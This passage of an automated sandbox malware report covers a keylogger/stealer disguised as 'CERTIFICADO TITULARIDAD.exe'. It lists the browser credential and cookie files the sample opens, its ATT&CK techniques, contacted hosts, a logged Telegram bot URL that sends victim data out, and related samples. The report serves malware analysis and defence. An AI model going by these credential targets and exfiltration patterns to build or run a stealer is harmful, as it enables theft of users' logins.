          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeQueries volume information: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: CERTIFICADO TITULARIDAD.exe PID: 2308, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          1
          Masquerading
          1
          OS Credential Dumping
          211
          Security Software Discovery
          Remote Services1
          Email Collection
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
          Process Injection
          1
          Disable or Modify Tools
          LSASS Memory41
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          41
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Application Window Discovery
          SMB/Windows Admin Shares1
          Data from Local System
          3
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Access Token Manipulation
          NTDS1
          System Network Configuration Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Process Injection
          LSA Secrets2
          File and Directory Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials215
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
          Obfuscated Files or Information
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          CERTIFICADO TITULARIDAD.exe11%ReversingLabs
          CERTIFICADO TITULARIDAD.exe100%AviraHEUR/AGEN.1331802
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dll0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          142.250.186.46
          truefalse
            high
            drive.usercontent.google.com
            172.217.18.1
            truefalse
              high
              reallyfreegeoip.org
              188.114.96.3
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  132.226.8.169
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/66.23.206.109false
                        high
                        http://checkip.dyndns.org/false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2011/11/2024%20/%2023:31:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037224000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://chrome.google.com/webstore?hl=enHCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000371F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.usercontent.google.com/%CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000003.2803888534.0000000006B21000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.office.com/lBCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.000000003722E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/HCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037224000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.usercontent.google.com/CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006B00000.00000004.00000020.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000003.2803888534.0000000006B21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://nsis.sf.net/NSIS_ErrorErrorCERTIFICADO TITULARIDAD.exe, 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmp, CERTIFICADO TITULARIDAD.exe, 00000000.00000000.2109728509.000000000040A000.00000008.00000001.01000000.00000003.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3373331622.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                      high
                                                      https://chrome.google.com/webstore?hl=enCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000371F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://aborters.duckdns.org:8081CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/66.23.206.109$CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.000000003712A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.google.com/CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://anotherarmy.dns.army:8081CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.orgCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.000000003712A000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000370BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.0000000037071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038376000.00000004.00000800.00020000.00000000.sdmp, CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org/xml/CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3400640723.00000000370BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                142.250.186.46
                                                                                drive.google.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                132.226.8.169
                                                                                checkip.dyndns.comUnited States
                                                                                16989UTMEMUSfalse
                                                                                149.154.167.220
                                                                                api.telegram.orgUnited Kingdom
                                                                                62041TELEGRAMRUfalse
                                                                                188.114.96.3
                                                                                reallyfreegeoip.orgEuropean Union
                                                                                13335CLOUDFLARENETUSfalse
                                                                                172.217.18.1
                                                                                drive.usercontent.google.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1553664
                                                                                Start date and time:2024-11-11 15:26:07 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 7m 49s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:6
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:CERTIFICADO TITULARIDAD.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 96%
                                                                                • Number of executed functions: 188
                                                                                • Number of non-executed functions: 126
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: CERTIFICADO TITULARIDAD.exe
                                                                                TimeTypeDescription
                                                                                09:28:12API Interceptor512x Sleep call for process: CERTIFICADO TITULARIDAD.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                132.226.8.169Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • checkip.dyndns.org/
                                                                                Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                NEW REQUIREMENT PO565432.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                fatura.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler 160924R0 _323282.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • checkip.dyndns.org/
                                                                                rYX7rFIO0x.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • checkip.dyndns.org/
                                                                                149.154.167.220Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            ORDER#73672-MAT373674849083403894808434PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    reallyfreegeoip.orgCkHXjQGPA5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    QNiXvaE3ps.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    N8Sriy2UsP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    NEW REQUIREMENT PO565432.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    api.telegram.orgQuotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    ORDER#73672-MAT373674849083403894808434PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 149.154.167.220
                                                                                                    173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    checkip.dyndns.comCkHXjQGPA5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 193.122.6.168
                                                                                                    QNiXvaE3ps.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 158.101.44.242
                                                                                                    N8Sriy2UsP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 132.226.247.73
                                                                                                    Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 193.122.6.168
                                                                                                    Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 193.122.6.168
                                                                                                    BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 158.101.44.242
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    NEW REQUIREMENT PO565432.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 193.122.6.168
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    TELEGRAMRUQuotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    BYi52hdbpP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    ungziped_file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Scan112024.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    ORDER#73672-MAT373674849083403894808434PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 149.154.167.220
                                                                                                    173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    UTMEMUSN8Sriy2UsP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 132.226.247.73
                                                                                                    Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.07.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    NEW REQUIREMENT PO565432.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    DHL 984468477.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 132.226.247.73
                                                                                                    Consulta de encomenda N#U00ba TM06-Q2-11-24.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    e-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 132.226.247.73
                                                                                                    17312555432bcbd00414ec1c141b698268dc6112a629b7da7379b907daaee7a87ea4e066bb444.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 128.169.185.69
                                                                                                    Inquiry HA-22-28199 22-077.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 132.226.8.169
                                                                                                    CLOUDFLARENETUSSWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 104.26.13.205
                                                                                                    sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 1.8.62.138
